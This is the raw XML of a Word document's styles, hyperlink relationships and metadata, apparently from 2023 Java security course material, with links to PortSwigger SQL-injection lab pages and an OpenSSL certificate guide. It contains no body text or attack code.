    <w:rsid w:val="00001411"/>
    <w:rsid w:val="0000144F"/>
    <w:rsid w:val="00007D86"/>
    <w:rsid w:val="00012744"/>
    <w:rsid w:val="00024C4E"/>
    <w:rsid w:val="00031C98"/>
    <w:rsid w:val="000725C7"/>
    <w:rsid w:val="00083371"/>
    <w:rsid w:val="000936C0"/>
    <w:rsid w:val="00093D0A"/>
    <w:rsid w:val="000B3957"/>
    <w:rsid w:val="000B6F22"/>
    <w:rsid w:val="000C2D8A"/>
    <w:rsid w:val="000F349E"/>
    <w:rsid w:val="00104E89"/>
    <w:rsid w:val="001156BB"/>
    <w:rsid w:val="00134608"/>
    <w:rsid w:val="00143791"/>
    <w:rsid w:val="00194F08"/>
    <w:rsid w:val="00197851"/>
    <w:rsid w:val="001B061D"/>
    <w:rsid w:val="001B33C8"/>
    <w:rsid w:val="001C4782"/>
    <w:rsid w:val="001C79DF"/>
    <w:rsid w:val="001E5367"/>
    <w:rsid w:val="002035A0"/>
    <w:rsid w:val="00216E6A"/>
    <w:rsid w:val="002268A8"/>
    <w:rsid w:val="00236FA2"/>
    <w:rsid w:val="002415AC"/>
    <w:rsid w:val="0024225A"/>
    <w:rsid w:val="00262DB0"/>
    <w:rsid w:val="0026491E"/>
    <w:rsid w:val="00275399"/>
    <w:rsid w:val="0028073D"/>
    <w:rsid w:val="002873F7"/>
    <w:rsid w:val="002B6EDA"/>
    <w:rsid w:val="002D1EBC"/>
    <w:rsid w:val="002E0C05"/>
    <w:rsid w:val="002F5544"/>
    <w:rsid w:val="00332A3D"/>
    <w:rsid w:val="003340EC"/>
    <w:rsid w:val="00336165"/>
    <w:rsid w:val="00363E27"/>
    <w:rsid w:val="00382B25"/>
    <w:rsid w:val="0038465F"/>
    <w:rsid w:val="003A0E57"/>
    <w:rsid w:val="003C1196"/>
    <w:rsid w:val="003D0D93"/>
    <w:rsid w:val="00433EFC"/>
    <w:rsid w:val="00440506"/>
    <w:rsid w:val="004451E8"/>
    <w:rsid w:val="00457657"/>
    <w:rsid w:val="00460A18"/>
    <w:rsid w:val="004A1E10"/>
    <w:rsid w:val="004B0015"/>
    <w:rsid w:val="004D01E5"/>
    <w:rsid w:val="004D2172"/>
    <w:rsid w:val="004D3549"/>
    <w:rsid w:val="00522AD0"/>
    <w:rsid w:val="00535E2D"/>
    <w:rsid w:val="0054474E"/>
    <w:rsid w:val="005615F4"/>
    <w:rsid w:val="00581631"/>
    <w:rsid w:val="0058279C"/>
    <w:rsid w:val="00593E1F"/>
    <w:rsid w:val="005B6930"/>
    <w:rsid w:val="00600950"/>
    <w:rsid w:val="006159CD"/>
    <w:rsid w:val="006215F2"/>
    <w:rsid w:val="006216A0"/>
    <w:rsid w:val="00622913"/>
    <w:rsid w:val="00634BCC"/>
    <w:rsid w:val="0064471B"/>
    <w:rsid w:val="006511D6"/>
    <w:rsid w:val="006534B5"/>
    <w:rsid w:val="00654FA3"/>
    <w:rsid w:val="00655491"/>
    <w:rsid w:val="006733E1"/>
    <w:rsid w:val="006A08D9"/>
    <w:rsid w:val="006A1DF0"/>
    <w:rsid w:val="006D4CE3"/>
    <w:rsid w:val="006F6602"/>
    <w:rsid w:val="0070593F"/>
    <w:rsid w:val="007137BB"/>
    <w:rsid w:val="007247F3"/>
    <w:rsid w:val="007309CF"/>
    <w:rsid w:val="0074040C"/>
    <w:rsid w:val="00744E6D"/>
    <w:rsid w:val="0077515E"/>
    <w:rsid w:val="00775348"/>
    <w:rsid w:val="007B18D7"/>
    <w:rsid w:val="007B2A97"/>
    <w:rsid w:val="007E1BAD"/>
    <w:rsid w:val="00805C87"/>
    <w:rsid w:val="0082289D"/>
    <w:rsid w:val="00842771"/>
    <w:rsid w:val="00854AB6"/>
    <w:rsid w:val="00865007"/>
    <w:rsid w:val="00870436"/>
    <w:rsid w:val="008735B4"/>
    <w:rsid w:val="008742FD"/>
    <w:rsid w:val="00897505"/>
    <w:rsid w:val="008A6FC7"/>
    <w:rsid w:val="008B0A64"/>
    <w:rsid w:val="008D0706"/>
    <w:rsid w:val="008D3FEF"/>
    <w:rsid w:val="008E4167"/>
    <w:rsid w:val="00907FC2"/>
    <w:rsid w:val="00925827"/>
    <w:rsid w:val="00925D37"/>
    <w:rsid w:val="00950D8C"/>
    <w:rsid w:val="00971164"/>
    <w:rsid w:val="0098676C"/>
    <w:rsid w:val="00992CC0"/>
    <w:rsid w:val="00993D4F"/>
    <w:rsid w:val="009B24BA"/>
    <w:rsid w:val="009D14BB"/>
    <w:rsid w:val="009D16C7"/>
    <w:rsid w:val="009E21B0"/>
    <w:rsid w:val="00A266F2"/>
    <w:rsid w:val="00A27C52"/>
    <w:rsid w:val="00A33274"/>
    <w:rsid w:val="00A34BBD"/>
    <w:rsid w:val="00A53DDC"/>
    <w:rsid w:val="00A6125B"/>
    <w:rsid w:val="00A75A20"/>
    <w:rsid w:val="00A75E59"/>
    <w:rsid w:val="00A92DE8"/>
    <w:rsid w:val="00A93F7E"/>
    <w:rsid w:val="00AA1E56"/>
    <w:rsid w:val="00AA279C"/>
    <w:rsid w:val="00AA3EBB"/>
    <w:rsid w:val="00AA72C7"/>
    <w:rsid w:val="00AB141D"/>
    <w:rsid w:val="00AB56F1"/>
    <w:rsid w:val="00AC3170"/>
    <w:rsid w:val="00AC5112"/>
    <w:rsid w:val="00AD302F"/>
    <w:rsid w:val="00AD3B6E"/>
    <w:rsid w:val="00AD5D30"/>
    <w:rsid w:val="00B3059D"/>
    <w:rsid w:val="00B44A4B"/>
    <w:rsid w:val="00B70DE4"/>
    <w:rsid w:val="00B81243"/>
    <w:rsid w:val="00B81FC0"/>
    <w:rsid w:val="00B87C52"/>
    <w:rsid w:val="00B96FF5"/>
    <w:rsid w:val="00BB6747"/>
    <w:rsid w:val="00BC3130"/>
    <w:rsid w:val="00BC5A0F"/>
    <w:rsid w:val="00BF094B"/>
    <w:rsid w:val="00C20076"/>
    <w:rsid w:val="00C32D58"/>
    <w:rsid w:val="00C65D33"/>
    <w:rsid w:val="00C728FE"/>
    <w:rsid w:val="00C75C8E"/>
    <w:rsid w:val="00C85572"/>
    <w:rsid w:val="00CB180D"/>
    <w:rsid w:val="00CB488A"/>
    <w:rsid w:val="00CC6007"/>
    <w:rsid w:val="00CD09AC"/>
    <w:rsid w:val="00CD5D06"/>
    <w:rsid w:val="00CF29AC"/>
    <w:rsid w:val="00D160A8"/>
    <w:rsid w:val="00D26EBA"/>
    <w:rsid w:val="00D57C6A"/>
    <w:rsid w:val="00D72720"/>
    <w:rsid w:val="00D74D9A"/>
    <w:rsid w:val="00DA203A"/>
    <w:rsid w:val="00DB44AE"/>
    <w:rsid w:val="00DC0584"/>
    <w:rsid w:val="00DE53D9"/>
    <w:rsid w:val="00DE7421"/>
    <w:rsid w:val="00DF5E36"/>
    <w:rsid w:val="00E1413B"/>
    <w:rsid w:val="00E15242"/>
    <w:rsid w:val="00E17B35"/>
    <w:rsid w:val="00E21F57"/>
    <w:rsid w:val="00E24B90"/>
    <w:rsid w:val="00E33E2F"/>
    <w:rsid w:val="00E43C20"/>
    <w:rsid w:val="00E508DE"/>
    <w:rsid w:val="00E65929"/>
    <w:rsid w:val="00E76414"/>
    <w:rsid w:val="00E804E1"/>
    <w:rsid w:val="00E808EE"/>
    <w:rsid w:val="00E92EF2"/>
    <w:rsid w:val="00EB0162"/>
    <w:rsid w:val="00EE33CF"/>
    <w:rsid w:val="00EF285F"/>
    <w:rsid w:val="00EF3D39"/>
    <w:rsid w:val="00F0328B"/>
    <w:rsid w:val="00F34DEC"/>
    <w:rsid w:val="00F7367E"/>
    <w:rsid w:val="00F90C67"/>
    <w:rsid w:val="00F9597E"/>
    <w:rsid w:val="00FB4C52"/>
    <w:rsid w:val="00FC2621"/>
    <w:rsid w:val="00FC7504"/>
    <w:rsid w:val="00FD0A65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E16F"/>
  <w15:docId w15:val="{3D17B0E6-DBD7-D442-A54C-CDD4761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List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002268A8"/>
    <w:pPr>
      <w:ind w:leftChars="200" w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afc">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="afd"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00287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首 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="afc"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002873F7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287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尾 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="afe"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002873F7"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff0">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B70DE4"/>
  </w:style>
  <w:style w:type="table" w:styleId="aff1">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001E53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0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AD302F"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="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AD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esproxy.com/downloa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ortswigger.net/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column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swigger.net/web-security/sql-injection/lab-login-bypa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gif"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tab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wca.com.tw/sslService" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data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centtuan/JavaSecurity2023" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-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ortswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-column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portswigger.net/web-security/all-lab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hrome://net-internals/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.miniasp.com/post/2019/02/25/Creating-Self-signed-Certificate-using-OpenSSL" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/union-attacks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E1749-5327-6B44-A44D-B8DDCAD7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2297</Words>
  <Characters>13094</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>109</Lines>
  <Paragraphs>30</Paragraphs>
  <ScaleCrop>false</ScaleCrop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weihan tuan</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2023-10-24T09:51:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-24T09:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-24T09:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>